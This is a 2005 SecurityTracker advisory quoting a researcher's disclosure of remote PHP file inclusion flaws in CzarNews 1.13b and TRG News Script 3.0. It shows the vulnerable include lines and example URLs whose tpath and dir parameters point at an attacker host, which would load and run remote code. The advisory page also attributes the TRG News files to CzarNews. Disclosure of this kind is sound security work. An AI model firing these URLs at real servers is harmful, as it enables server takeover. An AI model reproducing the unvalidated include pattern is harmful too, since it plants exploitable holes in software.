CzarNews Include File Hole Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1013486
|
|
SecurityTracker URL: http://securitytracker.com/id?1013486
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 21 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.13b
|
Description: Frank 'brOmstar' Reissner from [In]Security Research reported a vulnerability in CzarNews. A remote user can execute arbitrary commands on the target system.
Several scripts do not properly validate user-supplied input to prevent remote PHP code from being included. A remote user can supply
a URL with a specially crafted 'dir' parameter to cause arbitrary PHP code from a remote server to be included and executed by the
target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.
The
following files are affected:
install\article.php
install\authorall.php
install\comment.php
install\display.php
install\displayall.php
Other
files are also affected.
If 'register_globals' and 'allow_url_fopen' are set to 'on' in the 'php.ini' configuration file, then
this flaw can be exploited.
A demonstration exploit URL to execute 'newsconfig.php' from the attacker's system is provided:
http://[target]/research/news/trg_news30
/trgnews/install/article.php?dir=http://[attacker]
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.czaries.net/scripts/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Frank Reissner <mail@frank-reissner.de>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 20 Mar 2005 11:21:06 +0100
From: Frank_Reiner <mail@frank-reissner.de>
Subject: Two Php Application Vulnerabilties
|
Two little vulns I have discovered
#################################################################
#
# [In]Security Research 2005-001
#
# Affected Software: CzarNews (v1.13b)
# Impact: Remote File Inclusion
# Url: http://www.czaries.net/scripts/
#
# Author: Frank 'brOmstar'Reißner
# Date: 2k5-03-18
#
#################################################################
Software:
=========
CzarNews (v1.13b)
News Manager - Requires: php 4.x (safe_mode OFF), MySQL
Released on: 10-13-2004 @ 7:17 PM by Czaries
A free full-featured news manager that allows you to post news effortlessly
and easily.
Includes: Unlimited users, each with custom permissions, unlimited posting
categories,
web-based configuration, and a complete auto-installer for a quick setup in
minutes.
Vulnerability:
==============
Remote file inclusion in headlines.php and news.php via the tpath parameter.
headlines.php
-------------
require_once($tpath . "cn_config.php");
news.php
--------
require_once($tpath . "cn_config.php");
Example:
========
If register_globals=on and allow_url_fopen=on:
http://192.168.0.115/research/news/CzarNewsv113b/headlines.php?tpath=http://
attackerip/
http://192.168.0.115/research/news/CzarNewsv113b/news.php?tpath=http://attac
kerip/
where the file for inclusion must be named cn_config.php ->
http://attackerip/cn_config.php
Solution:
=========
Make a simple check if the file exits with the file_exits function or
deactivate
register_globals || allow_url_fopen.
#################################################################
greetings 2 buzzdee and the whole gsO team ;)
And
#################################################################
#
# [In]Security Research 2005-002
#
# Affected Software: TRG News Script(3.0)
# Impact: Remote File Inclusion
# Url:
http://www.hotscripts.com/jump.php?listing_id=17852&jump_type=1
#
# Author: Frank 'brOmstar'Reißner
# Date: 2k5-03-19
#
#################################################################
Software:
=========
The TRG News Script is an easily customizable news posting script. By simply
pasting a small block of code on your page, the TRG News Script will display
your newly posted material there. This script requires an SQL database.
Vulnerability:
==============
Remote file inclusion in
install\article.php
install\authorall.php
install\comment.php
install\display.php
install\displayall.php
and many more files
via the dir parameter.
include("$dir/newsconfig.php");
or
include("$dir/authorall.class.php");
or
include("$dir/comments.class.php");
or
include("$dir/news.class.php");
or
include("$dir/newsall.class.php");
or
and more and more ;)
Example:
========
If register_globals=on and allow_url_fopen=on:
http://192.168.0.115/research/news/trg_news30/trgnews/install/article.php?di
r=http://attackerip/
where the file for inclusion must be named newsconfig.php ->
http://attackerip/newsconfig.php
Solution:
=========
Make a simple check if the file exits with the file_exits function or
deactivate
register_globals || allow_url_fopen.
#################################################################
greetings 2 buzzdee and the whole gsO team ;)
Frank 'brOmstar' Reißner
|
|
